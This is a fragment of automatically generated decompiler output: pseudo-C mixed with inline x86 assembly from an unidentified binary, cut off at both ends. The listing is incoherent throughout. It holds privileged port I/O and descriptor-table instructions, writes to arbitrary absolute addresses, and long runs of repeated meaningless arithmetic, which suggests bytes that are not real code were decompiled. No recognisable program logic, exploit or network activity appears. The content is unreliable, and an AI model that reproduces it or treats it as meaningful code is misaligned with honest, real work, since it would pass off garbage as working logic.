				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t409;
				asm("out 0x2c, eax");
				asm("scasd");
				 *__esi =  *__esi + _t312;
				 *((intOrPtr*)(__edx + 0x2f)) =  *((intOrPtr*)(__edx + 0x2f)) + _t409;
				asm("scasd");
				 *_t409 =  *_t409 + _t312;
				_t397 = __ebx + __edx + _t409;
				 *((intOrPtr*)(_t397 + 0x2f)) =  *((intOrPtr*)(_t397 + 0x2f)) + __edx;
				_pop(ds);
				_t316 = _t312 - 0x0000000d +  *__esi | 0x7f000702;
				 *(_t316 + 0x1a) =  *(_t316 + 0x1a) ^ __edx;
				 *[ss:eax+0xf] =  *[ss:eax+0xf] + _t316;
				asm("pushad");
				asm("sbb dl, [esi]");
				 *((intOrPtr*)(_t316 + __esi + 0x65)) =  *((intOrPtr*)(_t316 + __esi + 0x65)) + _t316;
				asm("sbb dl, [esi]");
				 *((intOrPtr*)(__esi + 0x30)) =  *((intOrPtr*)(__esi + 0x30)) + _t409;
				asm("outsb");
				asm("sbb al, [esi]");
				 *_t409 =  *_t409 + _t397;
				asm("sbb al, 0x1f");
				 *((intOrPtr*)(_t316 + 0x1c)) =  *((intOrPtr*)(_t316 + 0x1c)) + __edx;
				 *(_t464 + 0x1a) =  *(_t464 + 0x1a) & _t397;
				 *[ss:eax+0xf] =  *[ss:eax+0xf] + (_t316 | 0x3c000602);
				 *__edi =  *__edi + __edx;
				 *0x66000134 =  *0x66000134 & 0x0000001a;
				ss = ss;
				asm("scasd");
				 *_t409 =  *_t409 + 0x1700011a;
				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t409;
				 *0xba000102 =  *0xba000102 ^ _t409;
				 *_t409 =  *_t409 | __edx;
				 *(__edi + 0x26000100) =  *(__edi + 0x26000100) ^ _t464;
				_t470 = _t469 ^ __edi;
				asm("sbb al, [ecx]");
				 *0xFFFFFFFFFBFA0522 =  *((intOrPtr*)(0xfffffffffbfa0522)) + __edx;
				 *_t409 =  *_t409 ^ 0xfffffffffbfa0522;
				asm("sbb eax, [ecx]");
				 *((intOrPtr*)(_t409 + __esi)) =  *((intOrPtr*)(_t409 + __esi)) + _t397;
				 *0x66000102 =  *0x66000102 ^ _t409;
				ss = ss;
				_t423 = __edx &  *(__edi + 0x6200060d);
				 *(__edi + 0x6b00010d) =  *(__edi + 0x6b00010d) ^ _t423;
				 *(__edi + 0x76000109) =  *(__edi + 0x76000109) ^ __esi;
				_t327 = 0xfffffffffffa0522 ^ __edi;
				 *_t409 =  *_t409 + _t327;
				_t328 = _t327 + _t397;
				asm("clc");
				 *_t409 =  *_t409 + _t328;
				 *((intOrPtr*)(__edi + 0x1020d31)) =  *((intOrPtr*)(__edi + 0x1020d31)) + 0x2d;
				 *((intOrPtr*)(__esi + 0x110fb31)) =  *((intOrPtr*)(__esi + 0x110fb31)) + _t409;
				 *((intOrPtr*)(_t464 + 0x100af31)) =  *((intOrPtr*)(_t464 + 0x100af31)) + _t397;
				 *((intOrPtr*)(__edi + 0x60d9731)) =  *((intOrPtr*)(__edi + 0x60d9731)) + _t328;
				_t424 = _t423 + 0x2d;
				_t465 = _t464 ^  *(__edi - 0x17ffea00);
				ss = ss;
				asm("sgdt [es:eax]");
				 *(__edi + _t465 * 4) =  *(__edi + _t465 * 4) ^ 0x00000000;
				 *_t328 =  *_t328 + _t328;
				0xb500(ss, ss, es, ss);
				 *_t409 =  *_t409 + 0x2d;
				 *0xd =  *0xd + 0xd;
				 *(__edi + _t424 * 4) =  *(__edi + _t424 * 4) << 1;
				asm("scasd");
				 *__esi =  *__esi + 0xd;
				_push(es);
				asm("salc");
				asm("fidiv word [0x80561c9f]");
				asm("out 0x35, al");
				asm("lahf");
				asm("sbb al, 0x56");
				_t425 = _t424 - 0x35;
				asm("lahf");
				asm("sbb al, 0x1");
				 *((intOrPtr*)(_t397 + 0x100af34)) =  *((intOrPtr*)(_t397 + 0x100af34)) + 0xd;
				 *_t409 =  *_t409 + 0xd;
				asm("scasd");
				 *_t397 =  *_t397 + _t425;
				 *((intOrPtr*)(_t397 - 0x37e318ca)) =  *((intOrPtr*)(_t397 - 0x37e318ca)) + __edi;
				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 & 0x0000000d;
				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 + 0xd;
				 *((intOrPtr*)(__esi + 0x51218500)) =  *((intOrPtr*)(__esi + 0x51218500)) + _t425;
				 *_t409 =  *_t409 + 0xd;
				_t426 = _t425 + _t425;
				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 & 0x0000000d;
				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 + 0xd;
				 *((intOrPtr*)(__esi + 0x6021b100)) =  *((intOrPtr*)(__esi + 0x6021b100)) + _t426;
				 *_t397 =  *_t397 + 0xd;
				_t398 = 0xffffffffb5d20200 + _t397;
				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 & 0x0000000d;
				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 + 0xd;
				 *((intOrPtr*)(__esi + 0x6821c500)) =  *((intOrPtr*)(__esi + 0x6821c500)) + _t426;
				 *0x20f400 =  *0x20f400 + 0xd;
				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 + 0xd;
				 *((intOrPtr*)(__esi + 0x6e21e700)) =  *((intOrPtr*)(__esi + 0x6e21e700)) + _t426;
				 *__esi =  *__esi + 0xd;
				_t336 = 0xffffffffb5d20200 + _t398;
				 *_t336 =  *_t336 & 0x0000000d;
				 *_t336 =  *_t336 + 0xd;
				 *((intOrPtr*)(_t398 + 0x76220300)) =  *((intOrPtr*)(_t398 + 0x76220300)) + _t426;
				 *__esi =  *__esi + 0xd;
				 *_t409 =  *_t409 + _t409;
				 *_t336 =  *_t336 & _t336;
				 *_t336 =  *_t336 + 0xd;
				 *((intOrPtr*)(_t398 + 0x7b221200)) =  *((intOrPtr*)(_t398 + 0x7b221200)) + _t426;
				 *__edi =  *__edi + 0xd;
				 *_t398 =  *_t398 + _t398;
				 *_t336 =  *_t336 & _t336;
				 *_t336 =  *_t336 + 0xd;
				 *((intOrPtr*)(_t398 + 0x7b221e00)) =  *((intOrPtr*)(_t398 + 0x7b221e00)) + _t426;
				 *__edi =  *__edi + 0xd;
				 *((intOrPtr*)(_t336 + 0x27)) =  *((intOrPtr*)(_t336 + 0x27)) + _t398;
				 *((intOrPtr*)(__esi - 0x68ddc800)) =  *((intOrPtr*)(__esi - 0x68ddc800)) + _t426;
				 *__edi =  *__edi + 0xd;
				 *__esi =  *__esi + _t398;
				 *_t336 =  *_t336 & _t336;
				 *_t336 =  *_t336 + 0xd;
				 *((intOrPtr*)(__esi - 0x6cf1dae8)) =  *((intOrPtr*)(__esi - 0x6cf1dae8)) + 0xd;
				 *_t336 =  *_t336 + _t409;
				 *__esi =  *__esi + _t336;
				 *_t336 =  *_t336 & _t336;
				 *_t336 =  *_t336 + 0xd;
				 *((intOrPtr*)(_t409 + 0x6e224718)) =  *((intOrPtr*)(_t409 + 0x6e224718)) + _t426;
				 *_t336 =  *_t336 + _t409;
				 *((intOrPtr*)(_t465 + 0x21)) =  *((intOrPtr*)(_t465 + 0x21)) + _t426;
				 *_t336 =  *_t336 + 0xd;
				 *_t336 =  *_t336 + 0xd;
				_t337 = _t398;
				_t399 = _t336;
				 *((intOrPtr*)(_t465 + 0x22)) =  *((intOrPtr*)(_t465 + 0x22)) + _t337;
				asm("daa");
				 *_t337 =  *_t337 + 0xd;
				 *_t337 =  *_t337 + 0xd;
				_t443 = _t337;
				 *((intOrPtr*)(_t399 + 0x22)) =  *((intOrPtr*)(_t399 + 0x22)) + _t399;
				asm("in al, 0x0");
				_t339 = __esi |  *__esi;
				 *((intOrPtr*)(_t443 - 0xadd7a00)) =  *((intOrPtr*)(_t443 - 0xadd7a00)) + 0xfc000800;
				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
				 *_t339 =  *_t339 & _t339;
				 *_t339 =  *_t339 + 0xd;
				 *((intOrPtr*)(_t409 + 0x6e229f00)) =  *((intOrPtr*)(_t409 + 0x6e229f00)) + 0xfc000800;
				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
				 *_t339 =  *_t339 & _t339;
				 *_t339 =  *_t339 + 0xd;
				 *((intOrPtr*)(_t443 + 0x6e22b200)) =  *((intOrPtr*)(_t443 + 0x6e22b200)) + 0xfc000800;
				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
				_t441 = 0x28;
				 *_t339 =  *_t339 & _t339;
				 *_t339 =  *_t339 + 0xd;
				 *((intOrPtr*)(_t409 + 0x6e22e900)) =  *((intOrPtr*)(_t409 + 0x6e22e900)) + 0xfc000800;
				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
				_push(ds);
				 *_t339 =  *_t339 & _t339;
				 *_t339 =  *_t339 + 0xd;
				 *((intOrPtr*)(_t443 - 0x6cf1dae8)) =  *((intOrPtr*)(_t443 - 0x6cf1dae8)) + 0xd;
				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
				asm("insd");
				 *_t339 =  *_t339 & _t339;
				 *_t339 =  *_t339 + 0xd;
				 *((intOrPtr*)(_t409 + 0x6e224718)) =  *((intOrPtr*)(_t409 + 0x6e224718)) + 0xfc000800;
				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
				 *_t339 = gs;
				 *_t339 =  *_t339 + 0xd;
				 *_t339 =  *_t339 + 0xd;
				_t410 = _t409 + _t399;
				_t341 = _t443 &  *_t441;
				 *((intOrPtr*)(_t341 + _t341)) =  *((intOrPtr*)(_t341 + _t341)) + _t410;
				asm("les ebp, [eax]");
				 *_t341 =  *_t341 + 0xd;
				 *_t341 =  *_t341 + 0xd;
				_t342 = _t339;
				_t445 = _t341;
				 *_t342 =  *_t342 + 0xfc000800;
				_t466 = _t465 &  *_t410;
				 *0x294c00 =  *0x294c00 + _t410;
				 *_t342 =  *_t342 + 0xd;
				 *((intOrPtr*)(_t445 + 0x67234900)) =  *((intOrPtr*)(_t445 + 0x67234900)) + 0xfc000800;
				 *_t445 =  *_t445 + _t410;
				 *((intOrPtr*)(_t342 + 0x29)) =  *((intOrPtr*)(_t342 + 0x29)) + _t342;
				 *((intOrPtr*)(_t445 - 0x6adc6a00)) =  *((intOrPtr*)(_t445 - 0x6adc6a00)) + 0xfc000800;
				 *_t410 = 0xfc000800 +  *_t410;
				 *_t342 =  *_t342 + _t342;
				_t343 = _t342 -  *_t342;
				 *_t343 =  *_t343 + 0xd;
				 *((intOrPtr*)(_t445 + 0x2923b900)) =  *((intOrPtr*)(_t445 + 0x2923b900)) + 0xfc000800;
				 *0xfc000800 = 0xfc000800 +  *0xfc000800;
				 *((intOrPtr*)(0xfc000800 + _t466)) =  *((intOrPtr*)(0xfc000800 + _t466)) + _t410;
				 *_t343 =  *_t343 + 0xd;
				 *((intOrPtr*)(_t410 - 0x48dc1a00)) =  *((intOrPtr*)(_t410 - 0x48dc1a00)) + 0xfc000800;
				 *_t399 =  *_t399 + 0xfc000800;
				 *_t445 =  *_t445 + _t399;
				 *_t343 =  *_t343 & _t343;
				 *_t343 =  *_t343 + 0xd;
				 *((intOrPtr*)(_t445 - 0x6cf1dae8)) =  *((intOrPtr*)(_t445 - 0x6cf1dae8)) + 0xd;
				 *_t445 =  *_t445 + 0xfc000800;
				 *((intOrPtr*)(0xfc000800 + _t466)) =  *((intOrPtr*)(0xfc000800 + _t466)) + _t343;
				_t344 = _t445;
				 *0x1202B824 =  *((intOrPtr*)(0x1202b824)) + 0xfc000800;
				 *((intOrPtr*)(_t344 + 0x2b)) =  *((intOrPtr*)(_t344 + 0x2b)) + _t399;
				 *_t344 =  *_t344 + 0xd;
				 *_t344 =  *_t344 + 0xd;
				_t447 = _t344;
				 *((intOrPtr*)(_t399 + 0x10)) =  *((intOrPtr*)(_t399 + 0x10)) + _t410;
				 *0xfc000800 =  *0xfc000800 + 1;
				asm("sbb [eax], al");
				L1();
				 *((intOrPtr*)(_t447 + 0x52106b00)) =  *((intOrPtr*)(_t447 + 0x52106b00)) + 0xfc000800;
				_t400 = _t399 +  *0xfc000800;
				 *((intOrPtr*)(_t470 + _t466)) =  *((intOrPtr*)(_t470 + _t466)) + _t410;
				_t448 = _t343;
				 *((intOrPtr*)(_t400 + 0x10)) =  *((intOrPtr*)(_t400 + 0x10)) + _t410;
				 *_t400 =  *_t400 + 0x1c;
				_t348 = _t447 + _t447;
				 *_t348 =  *_t348 + 0xd;
				 *((intOrPtr*)(_t448 - 0x35db3600)) =  *((intOrPtr*)(_t448 - 0x35db3600)) + 0xfc000800;
				_t401 = _t400 +  *0x2d7800;
				 *_t348 =  *_t348 + 0xd;
				 *((intOrPtr*)(_t448 + 0x40f8300)) =  *((intOrPtr*)(_t448 + 0x40f8300)) + 0xfc000800;
				_t349 = _t448;
				_t449 = _t348;
				 *((intOrPtr*)(_t401 + 0x1f04040f)) =  *((intOrPtr*)(_t401 + 0x1f04040f)) + 0xd;
				 *_t349 =  *_t349 + 0xd;
				 *[cs:eax] =  *[cs:eax] + 0xd;
				 *_t349 =  *_t349 + 0xd;
				_t411 = _t349;
				_t402 = _t401 + _t401;
				_t352 = (_t410 & 0x00000049) + 0x20;
				 *((intOrPtr*)(_t352 + 0x2e)) =  *((intOrPtr*)(_t352 + 0x2e)) + _t411;
				 *((intOrPtr*)(_t411 - 0x37db0e00)) =  *((intOrPtr*)(_t411 - 0x37db0e00)) + 0xfc000800;
				_t353 = _t352 + 0x22;
				 *_t449 =  *_t449 + _t402;
				 *_t353 =  *_t353 & _t353;
				 *_t353 =  *_t353 + 0xd;
				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
				 *0x315000 =  *0x315000 + _t353;
				 *_t353 =  *_t353 + 0xd;
				 *((intOrPtr*)(_t402 - 0x66f07600)) =  *((intOrPtr*)(_t402 - 0x66f07600)) + 0xd;
				_t354 = _t353 +  *0x211e00;
				 *_t354 =  *_t354 + 0xd;
				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
				 *_t449 =  *_t449 + _t354;
				 *((intOrPtr*)(_t411 + 0x21)) =  *((intOrPtr*)(_t411 + 0x21)) + _t402;
				 *_t354 =  *_t354 + 0xd;
				 *_t354 =  *_t354 + 0xd;
				 *_t354 =  *_t354 + 0xffffff97;
				asm("adc [esp+eax], bh");
				 *[es:edi+0x21] =  *[es:edi+0x21] + 0xd;
				 *((intOrPtr*)(_t402 + 0x1110ad00)) =  *((intOrPtr*)(_t402 + 0x1110ad00)) + 0xd;
				_t355 = _t354 + 0x21aa0027;
				 *_t355 =  *_t355 + 0xd;
				 *_t355 =  *_t355 + 0xd;
				_t356 = _t411;
				_t412 = _t355;
				asm("sbb [edi+0x22], al");
				asm("outsb");
				 *_t356 =  *_t356 + _t412;
				 *_t449 =  *_t449 + _t402;
				 *_t356 =  *_t356 & _t356;
				 *_t356 =  *_t356 + 0xd;
				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
				 *_t356 =  *_t356 + _t412;
				 *((intOrPtr*)(_t449 + 0x21)) =  *((intOrPtr*)(_t449 + 0x21)) + 0xfc000800;
				 *((intOrPtr*)(_t402 + 0x4e0f6400)) =  *((intOrPtr*)(_t402 + 0x4e0f6400)) + 0xd;
				_t413 = _t412 +  *_t356;
				 *_t449 =  *_t449 + _t402;
				 *_t356 =  *_t356 & _t356;
				 *_t356 =  *_t356 + 0xd;
				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
				 *_t413 =  *_t413 + _t413;
				 *((intOrPtr*)(_t356 + 0x32)) =  *((intOrPtr*)(_t356 + 0x32)) + _t413;
				 *_t356 =  *_t356 + 0xd;
				 *_t356 =  *_t356 + 0xd;
				 *_t356 =  *_t356 + 0x5a;
				_t357 = _t356 & 0x0029056a;
				_push(ds);
				 *_t357 =  *_t357 & _t357;
				 *_t357 =  *_t357 + 0xd;
				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
				 *0xfc000800 =  *0xfc000800 + _t413;
				 *((intOrPtr*)(_t449 + 0x21)) =  *((intOrPtr*)(_t449 + 0x21)) + _t402;
				 *((intOrPtr*)(_t402 + 0x3c257e00)) =  *((intOrPtr*)(_t402 + 0x3c257e00)) + 0xd;
				_t359 = _t357 + 0xfffffffffc00082a;
				 *_t359 =  *_t359 & _t359;
				 *_t359 =  *_t359 + 0xd;
				 *((intOrPtr*)(_t402 - 0x66da7300)) =  *((intOrPtr*)(_t402 - 0x66da7300)) + 0xd;
				_t414 = _t413 +  *_t402;
				 *((intOrPtr*)(0xfc000800 + _t449)) =  *((intOrPtr*)(0xfc000800 + _t449)) + _t414;
				 *_t359 =  *_t359 + 0xffffffa1;
				_t360 = _t359 & 0x002c057f;
				_push(ds);
				 *_t360 =  *_t360 & _t360;
				 *_t360 =  *_t360 + 0xd;
				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
				 *0x21e700 =  *0x21e700 + _t414;
				 *_t360 =  *_t360 + 0xd;
				 *((intOrPtr*)(_t402 + 0x3c25cc00)) =  *((intOrPtr*)(_t402 + 0x3c25cc00)) + 0xd;
				_t361 = _t360 + 0x2d;
				_t428 = 0xfc000800 + _t402;
				 *_t361 =  *_t361 & _t361;
				 *_t361 =  *_t361 + 0xd;
				 *((intOrPtr*)(_t414 + 0x6e224718)) =  *((intOrPtr*)(_t414 + 0x6e224718)) + _t428;
				 *_t449 =  *_t449 + _t414;
				 *_t449 =  *_t449 + _t402;
				 *_t361 =  *_t361 & _t361;
				 *_t361 =  *_t361 + 0xd;
				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
				 *_t449 =  *_t449 + _t414;
				 *((intOrPtr*)(_t449 + 0x21)) =  *((intOrPtr*)(_t449 + 0x21)) + _t428;
				 *((intOrPtr*)(_t402 + 0x4e25e800)) =  *((intOrPtr*)(_t402 + 0x4e25e800)) + 0xd;
				_t415 = _t414 +  *_t449;
				 *((intOrPtr*)(_t402 + _t449)) =  *((intOrPtr*)(_t402 + _t449)) + _t361;
				 *_t361 =  *_t361 + 0xd;
				 *_t361 =  *_t361 + 0xd;
				_t362 = _t449;
				_t450 = _t361;
				 *_t362 =  *_t362 + _t415;
				asm("loope 0x8");
				asm("das");
				 *((intOrPtr*)(_t402 + _t450)) =  *((intOrPtr*)(_t402 + _t450)) + _t428;
				_t363 = _t450;
				_t451 = _t362;
				 *_t451 =  *_t451 + _t363;
				_t429 = _t428 - 1;
				_push(es);
				_push(es);
				_t365 = (_t363 ^  *_t363) &  *(_t363 ^  *_t363);
				 *_t365 =  *_t365 + 0xd;
				 *((intOrPtr*)(_t415 + 0x6e224718)) =  *((intOrPtr*)(_t415 + 0x6e224718)) + _t429;
				 *_t441 = _t429 +  *_t441;
				 *_t451 =  *_t451 + _t402;
				 *_t365 =  *_t365 & _t365;
				 *_t365 =  *_t365 + 0xd;
				 *((intOrPtr*)(_t451 - 0x6cf1dae8)) =  *((intOrPtr*)(_t451 - 0x6cf1dae8)) + 0xd;
				 *_t441 = _t429 +  *_t441;
				 *0xfc000800 = _t429 +  *0xfc000800;
				_t366 = _t365 &  *_t365;
				 *_t366 =  *_t366 + 0xd;
				 *((intOrPtr*)(_t402 - 0x7cd9af00)) =  *((intOrPtr*)(_t402 - 0x7cd9af00)) + 0xd;
				_push(es);
				asm("aaa");
				 *((intOrPtr*)(_t470 + _t451)) =  *((intOrPtr*)(_t470 + _t451)) + _t415;
				 *_t366 =  *_t366 + 0xd;
				 *_t366 =  *_t366 + 0xd;
				_t367 = _t451;
				 *((intOrPtr*)(_t466 + 0x3806f826)) =  *((intOrPtr*)(_t466 + 0x3806f826)) + _t415;
				 *((intOrPtr*)(_t367 + 0x35)) =  *((intOrPtr*)(_t367 + 0x35)) + _t402;
				 *_t367 =  *_t367 + 0xd;
				 *_t367 =  *_t367 + 0xd;
				_t368 = _t366;
				_t453 = _t367;
				 *((intOrPtr*)(_t466 + 0x3b075226)) =  *((intOrPtr*)(_t466 + 0x3b075226)) + _t402;
				_t368[0xd] = _t368[0xd] + _t402;
				 *((intOrPtr*)(_t453 - 0x7fd93100)) =  *((intOrPtr*)(_t453 - 0x7fd93100)) + _t429;
				 *0x3be000 =  *0x3be000 | _t441;
				 *_t368 =  *_t368 + 0xd;
				 *((intOrPtr*)(_t453 + 0xd26db00)) =  *((intOrPtr*)(_t453 + 0xd26db00)) + _t429;
				 *_t441 =  *_t441 + _t415;
				_t369 = _t453;
				_t454 = _t368;
				_t404 = (_t402 |  *_t453) + (_t402 |  *_t453);
				 *_t369 =  *_t369 + 0xd;
				 *_t369 =  *_t369 + 0xd;
				_t417 =  *_t369;
				 *_t369 =  *[es:edx] * 0x22150040;
				asm("out dx, eax");
				asm("sbb eax, 0x22");
				 *((intOrPtr*)(_t454 - 0x66d8baf8)) =  *((intOrPtr*)(_t454 - 0x66d8baf8)) + 0xd;
				_t372 = (_t369 | 0x00430072) +  *_t404 &  *[es:eax];
				 *_t372 =  *_t372 + 0xd;
				_t454[0x689d382] = _t454[0x689d382] + 0xd;
				 *((intOrPtr*)(_t372 + _t372 + 0x2e)) =  *((intOrPtr*)(_t372 + _t372 + 0x2e)) + _t372;
				_t373 = _t372 &  *_t372;
				 *_t373 =  *_t373 + 0xd;
				 *((intOrPtr*)(_t454 - 0x77d8a7f8)) =  *((intOrPtr*)(_t454 - 0x77d8a7f8)) + 0xd;
				_t374 = _t373 |  *(_t373 + _t373 + 0x1e);
				 *_t374 =  *_t374 & _t374;
				 *_t374 =  *_t374 + 0xd;
				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
				 *_t466 =  *_t466 + 0xd;
				asm("aaa");
				_t375 = _t374 &  *_t374;
				 *_t375 =  *_t375 + 0xd;
				 *((intOrPtr*)(_t454 - 0x72f1dae8)) =  *((intOrPtr*)(_t454 - 0x72f1dae8)) + 0xd;
				_t376 = _t375 |  *_t466;
				_push(ds);
				 *_t376 =  *_t376 & _t376;
				 *_t376 =  *_t376 + 0xd;
				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
				 *_t441 =  *_t441 + 0xd;
				_t467 = _t466 - 1;
				_t377 = _t376 &  *_t376;
				 *_t377 =  *_t377 + 0xd;
				 *((intOrPtr*)(_t404 - 0x15ed5a00)) =  *((intOrPtr*)(_t404 - 0x15ed5a00)) + 0xd;
				 *_t441 =  *_t441 | 0x0000000d;
				_push(ds);
				 *_t377 =  *_t377 & _t377;
				 *_t377 =  *_t377 + 0xd;
				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
				 *_t377 =  *_t377 + _t417;
				asm("pushad");
				_t378 = _t377 &  *_t377;
				 *_t378 =  *_t378 + 0xd;
				 *((intOrPtr*)(_t404 - 0x15ed3700)) =  *((intOrPtr*)(_t404 - 0x15ed3700)) + 0xd;
				 *_t378 =  *_t378 | _t417;
				_push(ds);
				 *_t378 =  *_t378 & _t378;
				 *_t378 =  *_t378 + 0xd;
				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
				 *_t417 =  *_t417 + _t417;
				_t379 = _t378 ^ 0x0000003f;
				 *_t379 =  *_t379 + 0xd;
				 *_t379 =  *_t379 + 0xd;
				 *_t379 =  *_t379 + 0xffffffe2;
				asm("adc ch, dl");
				 *_t417 =  *_t417 | _t417;
				if( *_t417 == 0) {
					 *_t379 =  *_t379 + 0xd;
					 *_t379 =  *_t379 + 0xd;
					_t265 = _t379;
					_t379 = _t417;
					_t417 = _t265;
					asm("sbb [edi+0x22], al");
					asm("outsb");
					 *0xfc000800 =  *0xfc000800 + _t417;
					_push(ds);
					 *_t379 =  *_t379 & _t379;
					 *_t379 =  *_t379 + 0xd;
					 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + 0xd;
					 *0xfc000800 =  *0xfc000800 + _t417;
					 *0xfc000800 =  *0xfc000800 & 0x00000000;
					 *_t379 =  *_t379 + 0x2f;
				}
				asm("das");
				asm("adc bl, [edx]");
				 *_t429 =  *_t429 | _t417;
				asm("adc ah, [edx]");
				 *_t379 =  *_t379 + _t379;
				 *_t379 =  *_t379 + _t379;
				 *_t379 =  *_t379 + 0x4c;
				asm("adc bh, [eax]");
				 *_t404 =  *_t404 | _t417;
				 *_t429 = _t470;
				 *_t379 =  *_t379 + _t379;
				 *_t379 =  *_t379 + _t379;
				 *_t379 =  *_t379 + 0x71;
				asm("adc bh, [ecx+0x8]");
				 *_t429 = _t429 +  *_t429;
				 *_t379 =  *_t379 + 0xffffff8e;
				asm("adc ch, [ebx+0x1e004d08]");
				 *_t379 =  *_t379 & _t379;
				 *_t379 =  *_t379 + _t379;
				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + _t379;
				 *_t454 =  *_t454 + _t417;
				asm("aas");
				 *_t379 =  *_t379 + _t379;
				 *_t379 =  *_t379 + _t379;
				 *_t379 =  *_t379 + 0xffffffec;
				asm("adc ecx, ecx");
				 *_t454 =  *_t454 | _t417;
				asm("pushfd");
				_t380 = _t379 &  *_t379;
				 *_t380 =  *_t380 + _t380;
				 *((intOrPtr*)(_t417 + 0x6e224718)) =  *((intOrPtr*)(_t417 + 0x6e224718)) + _t429;
				 *_t441 =  *_t441 + _t417;
				_push(ds);
				 *_t380 =  *_t380 & _t380;
				 *_t380 =  *_t380 + _t380;
				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + _t380;
				 *_t441 =  *_t441 + _t417;
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + 0x26;
				asm("adc al, 0xc9");
				 *_t441 =  *_t441 | _t417;
				asm("int3");
				asm("aas");
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + _t380;
				_t381 = _t454;
				asm("daa");
				 *_t404 =  *_t404 - _t417;
				_push(_t381);
				_t381[0x10] = _t381 + _t381[0x10];
				 *_t381 = _t381 +  *_t381;
				 *_t381 = _t381 +  *_t381;
				_t382 = _t380;
				asm("daa");
				asm("loopne 0x42");
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				_t434 = (_t429 + _t404 + _t404 + 0x00000001 |  *(_t429 + _t404 + _t404 + 1)) + _t404;
				asm("daa");
				 *_t404 = _t417;
				_push(_t467);
				_t384 = _t381 + _t434;
				 *_t384 =  *_t384 + _t384;
				 *_t384 =  *_t384 + _t384;
				_t385 = _t382;
				 *_t434 =  *_t434 + _t385;
				 *((intOrPtr*)(_t441 + 0x800580b)) =  *((intOrPtr*)(_t441 + 0x800580b)) - _t434;
				_t435 = _t434 + 1;
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + _t385;
				_t386 = _t384;
				 *_t435 =  *_t435 + _t386;
				_t420 =  *_t404 + 1 - _t404;
				_t436 = _t435 + 1;
				 *_t386 =  *_t386 + _t386;
				 *_t386 =  *_t386 + _t386;
				_t387 = _t385;
				_t460 = _t386;
				 *((intOrPtr*)(_t436 + 0x28)) =  *((intOrPtr*)(_t436 + 0x28)) + _t420;
				asm("cld");
				_t406 = _t404 |  *(_t386 + _t386 + 0x3c) |  *_t460;
				asm("pushfd");
				 *_t387 =  *_t387 + _t387;
				 *_t387 =  *_t387 + _t387;
				_t438 = _t436 + 1 + _t406;
				asm("daa");
				_t390 = (_t460 | 0x00000060) + _t438;
				_t407 = _t406 + 1;
				 *_t390 =  *_t390 + _t390;
				 *_t390 =  *_t390 + _t390;
				_t391 = _t387;
				 *((intOrPtr*)(_t420 + 0x640c5b28)) =  *((intOrPtr*)(_t420 + 0x640c5b28)) + _t420;
				 *_t391 =  *_t391 + _t391;
				 *_t391 =  *_t391 + _t391;
				 *_t391 =  *_t391 + _t391;
				_t392 = _t390;
				_t463 = _t391;
				 *((intOrPtr*)(_t407 + 0x650c8028)) =  *((intOrPtr*)(_t407 + 0x650c8028)) + _t438;
				 *((intOrPtr*)(_t392 + 0x44)) =  *((intOrPtr*)(_t392 + 0x44)) + _t438;
				 *((intOrPtr*)(_t463 - 0x3ad72700)) =  *((intOrPtr*)(_t463 - 0x3ad72700)) + _t438;
				_t393 = _t392 | 0x00000068;
				 *_t463 =  *_t463 + _t407;
				 *_t393 =  *_t393 & _t393;
				 *_t393 =  *_t393 + _t393;
